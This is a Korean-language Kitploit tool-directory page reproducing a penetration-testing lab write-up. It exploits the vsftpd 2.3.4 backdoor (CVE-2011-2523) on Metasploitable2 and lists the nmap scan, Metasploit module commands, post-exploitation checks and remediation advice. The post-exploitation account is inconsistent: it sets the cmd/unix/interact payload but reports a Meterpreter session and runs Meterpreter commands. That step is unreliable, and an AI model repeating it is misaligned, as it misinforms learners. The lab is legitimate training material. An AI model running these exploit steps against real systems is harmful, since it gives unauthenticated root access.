Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
metasploitable2-vsftpd-writeup — Metasploitable2에서 vsftpd 2.3.4 백도어(CVE-2011-2523) 악용 — 정찰, 악용, 그리고 조치를 다루는 실습형 침투 테스트 랩 작성글. | Kitploit
도구/GitHubGitHub/rsakthikumar-cmd/metasploitable2-vsftpd-writeup
ReconnaissanceVulnerability ScannersVulnerability AnalysisExploitationPost-ExploitationPenetration TestingLearning & EducationLabs & Practice

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHub
rsakthikumar-cmd/metasploitable2-vsftpd-writeup

metasploitable2-vsftpd-writeup

Metasploitable2에서 vsftpd 2.3.4 백도어(CVE-2011-2523) 악용 — 정찰, 악용, 그리고 조치를 다루는 실습형 침투 테스트 랩 작성글.

저장소 보기
1일 전아직 검토되지 않음

Metasploitable2 — vsftpd 2.3.4 백도어 악용

vsftpd 2.3.4의 알려진 백도어 취약점을 발견하고 악용하는 실습형 랩으로, 격리된 Kali Linux ↔ Metasploitable2 환경을 사용합니다.

목표

의도적으로 취약하게 구성된 대상 머신을 상대로 침투 테스트 핵심 워크플로(정보 수집, 취약점 식별, 악용, 악용 후 검증)를 연습합니다.

실습 환경

구성 요소세부 정보
공격자Kali Linux 2026.1 (VMware)
대상Metasploitable2 (VMware)
네트워크NAT, 호스트/인터넷에서 격리됨
대상 IP192.168.233.129

두 VM 모두 실제 네트워크에서 격리된 동일한 사설 네트워크 세그먼트에 유지하여, 실습이 외부에 노출되지 않도록 했습니다.

방법론

1. 정보 수집 — Nmap 스캔

root@kitploit:~
nmap -sV -sC 192.168.233.129

대상의 열린 포트와 서비스 버전을 스캔했습니다. 결과는 다음과 같습니다:

root@kitploit:~
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
...

vsftpd 2.3.4를 보여주는 Nmap 스캔

2. 취약점 식별

포트 21에서 vsftpd 2.3.4가 실행 중이었습니다. 이 특정 버전은 백도어를 포함하는 것으로 공개적으로 알려져 있습니다: 2011년, 공식 vsftpd 소스 아카이브가 손상되어 악성 코드가 삽입되었습니다. :) 문자열이 포함된 사용자 이름으로 로그인하면 TCP 포트 6200에 숨겨진 리스너가 트리거되어 인증 없이 원격 셸을 얻을 수 있습니다.

  • 참고: CVE-2011-2523
  • 영향: 인증 없이 root 권한으로 원격 코드 실행

3. 악용 — Metasploit

root@kitploit:~
msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.233.129
set payload cmd/unix/interact
run

악용 코드가 백도어를 성공적으로 트리거하여 Meterpreter 세션을 반환했습니다.

Meterpreter 세션이 열린 Metasploit 악용 실행

4. 악용 후 검증

root@kitploit:~
sessions -i 1
sysinfo
getuid

손상된 호스트에서 활성 세션과 접근 권한 수준을 확인했습니다.

sysinfo 출력

root 접근을 확인하는 getuid 출력

결과

인증 없이, 오래되고 백도어가 삽입된 단일 서비스를 악용하여 대상 머신에 대한 완전한 root 권한 원격 셸 접근을 획득했습니다.

근본 원인

  • 소스 자체가 손상된 것으로 알려진 오래된 소프트웨어 버전(vsftpd 2.3.4)
  • 알려진 취약 서비스 버전을 탐지하거나 패치할 프로세스가 없음

해결 방안

  • vsftpd를 현재의 검증된 클린 릴리스로 업그레이드
  • 체크섬 검증과 함께 공식/검증된 저장소에서만 소프트웨어 패키지 다운로드
  • 배포 전에 오래된 서비스 버전을 발견하기 위한 정기적인 취약점 스캔 구현
  • 불필요하게 노출된 서비스(FTP)는 필요하지 않은 경우 제한하거나 추가 접근 제어 뒤에 배치

핵심 교훈

알려진 공개 취약점이 있는 단일 오래된 서비스만으로도 시스템 전체를 손상시키기에 충분했습니다 — 맞춤형 악용 코드 개발이나 고급 기술이 필요 없었습니다. 이는 패치 관리와 버전 위생이 실제 보안 태세의 기초가 되는 이유를 보여줍니다.

면책 조항

이 실습은 보안 교육용으로 설계된 의도적으로 취약한 가상 머신인 Metasploitable2만을 대상으로, 운영 시스템이나 제3자 인프라와 연결되지 않은 격리된 랩 네트워크에서만 수행되었습니다.

도구 다운로드